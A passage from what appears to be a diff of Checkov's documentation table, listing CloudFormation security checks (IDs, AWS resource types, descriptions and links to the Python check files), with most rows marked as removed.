 |  67 | CKV_AWS_76  | resource | AWS::Serverless::Api                      | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py)                                                                 |
 |  68 | CKV_AWS_78  | resource | AWS::CodeBuild::Project                   | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py)                                                           |
 |  69 | CKV_AWS_79  | resource | AWS::EC2::LaunchTemplate                  | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py)                                                                                   |
-|  70 | CKV_AWS_82  | resource | AWS::Athena::WorkGroup                    | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                       |
-|  71 | CKV_AWS_83  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                 |
-|  72 | CKV_AWS_84  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
-|  73 | CKV_AWS_84  | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
-|  74 | CKV_AWS_85  | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py)                                                                                       |
-|  75 | CKV_AWS_86  | resource | AWS::CloudFront::Distribution             | Ensure CloudFront Distribution has Access Logging enabled                                                                                                                                                | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py)                                                     |
-|  76 | CKV_AWS_87  | resource | AWS::Redshift::Cluster                    | Redshift cluster should not be publicly accessible                                                                                                                                                       | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py)                                             |
-|  77 | CKV_AWS_88  | resource | AWS::EC2::Instance                        | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
-|  78 | CKV_AWS_88  | resource | AWS::EC2::LaunchTemplate                  | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
-|  79 | CKV_AWS_89  | resource | AWS::DMS::ReplicationInstance             | DMS replication instance should not be publicly accessible                                                                                                                                               | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                               |
-|  80 | CKV_AWS_90  | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py)                                                                                               |
-|  81 | CKV_AWS_91  | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py)                                                                                 |
-|  82 | CKV_AWS_92  | resource | AWS::ElasticLoadBalancing::LoadBalancer   | Ensure the ELB has access logging enabled                                                                                                                                                                | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py)                                                                                     |
-|  83 | CKV_AWS_94  | resource | AWS::Glue::DataCatalogEncryptionSettings  | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py)                                                             |
-|  84 | CKV_AWS_95  | resource | AWS::ApiGatewayV2::Stage                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
-|  85 | CKV_AWS_95  | resource | AWS::Serverless::HttpApi                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
-|  86 | CKV_AWS_96  | resource | AWS::RDS::DBCluster                       | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py)                                                                               |
-|  87 | CKV_AWS_97  | resource | AWS::ECS::TaskDefinition                  | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                       |
-|  88 | CKV_AWS_99  | resource | AWS::Glue::SecurityConfiguration          | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py)                                                             |
-|  89 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup                       | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                               |
-|  90 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster                   | Ensure Neptune logging is enabled                                                                                                                                                                        | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py)                                                                     |
-|  91 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener     | Ensure that Load Balancer Listener is using at least TLS v1.2                                                                                                                                            | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py)                                                                               |
-|  92 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py)                                                                                   |
-|  93 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup      | Ensure Redshift uses SSL                                                                                                                                                                                 | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py)                                                                                         |
-|  94 | CKV_AWS_107 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  95 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  96 | CKV_AWS_107 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  97 | CKV_AWS_107 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  98 | CKV_AWS_107 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
-|  99 | CKV_AWS_108 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 100 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 101 | CKV_AWS_108 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 102 | CKV_AWS_108 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 103 | CKV_AWS_108 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
-| 104 | CKV_AWS_109 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 105 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 106 | CKV_AWS_109 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 107 | CKV_AWS_109 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 108 | CKV_AWS_109 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
-| 109 | CKV_AWS_110 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 110 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 111 | CKV_AWS_110 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 112 | CKV_AWS_110 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 113 | CKV_AWS_110 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
-| 114 | CKV_AWS_111 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 115 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 116 | CKV_AWS_111 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 117 | CKV_AWS_111 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 118 | CKV_AWS_111 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
-| 119 | CKV_AWS_115 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
-| 120 | CKV_AWS_115 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
-| 121 | CKV_AWS_116 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
-| 122 | CKV_AWS_116 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
-| 123 | CKV_AWS_117 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
-| 124 | CKV_AWS_117 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
-| 125 | CKV_AWS_118 | resource | AWS::RDS::DBInstance                      | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                             |
-| 126 | CKV_AWS_119 | resource | AWS::DynamoDB::Table                      | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                 |
-| 127 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage                    | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
-| 128 | CKV_AWS_120 | resource | AWS::Serverless::Api                      | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
-| 129 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService              | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                 |
-| 130 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py)                                                                           |
-| 131 | CKV_AWS_136 | resource | AWS::ECR::Repository                      | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                   |
-| 132 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret               | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                       |
-| 133 | CKV_AWS_154 | resource | AWS::Redshift::Cluster                    | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                               |
-| 134 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                       |
-| 135 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                       |
-| 136 | CKV_AWS_157 | resource | AWS::RDS::DBInstance                      | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py)                                                                             |
-| 137 | CKV_AWS_158 | resource | AWS::Logs::LogGroup                       | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                               |
-| 138 | CKV_AWS_160 | resource | AWS::Timestream::Database                 | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                               |
-| 139 | CKV_AWS_161 | resource | AWS::RDS::DBInstance                      | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py)                                                                       |
-| 140 | CKV_AWS_162 | resource | AWS::RDS::DBCluster                       | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                         |
-| 141 | CKV_AWS_163 | resource | AWS::ECR::Repository                      | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py)                                                                               |
-| 142 | CKV_AWS_164 | resource | AWS::Transfer::Server                     | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py)                                                                   |
-| 143 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable                | Ensure DynamoDB global table point in time recovery (backup) is enabled                                                                                                                                  | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py)                                                         |
-| 144 | CKV_AWS_166 | resource | AWS::Backup::BackupVault                  | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py)                                                                       |
-| 145 | CKV_AWS_170 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                             |
-| 146 | CKV_AWS_172 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                       |
-| 147 | CKV_AWS_173 | resource | AWS::Lambda::Function                     | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
-| 148 | CKV_AWS_173 | resource | AWS::Serverless::Function                 | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
-| 149 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution             | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py)                                                                                 |
-| 150 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL                        | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py)                                                                           |
-| 151 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Logging enabled                                                                                                                                                                       | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py)                                                                                   |
-| 152 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                     |
-| 153 | CKV_AWS_195 | resource | AWS::Glue::Crawler                        | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
-| 154 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint                    | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
-| 155 | CKV_AWS_195 | resource | AWS::Glue::Job                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
-| 156 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker                     | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py)                                                                       |
-| 157 | CKV_AWS_258 | resource | AWS::Lambda::Url                          | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                     |
-| 158 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
-| 159 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                           |
-| 160 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
-| 161 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                 |
-| 162 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py)                                                                       |
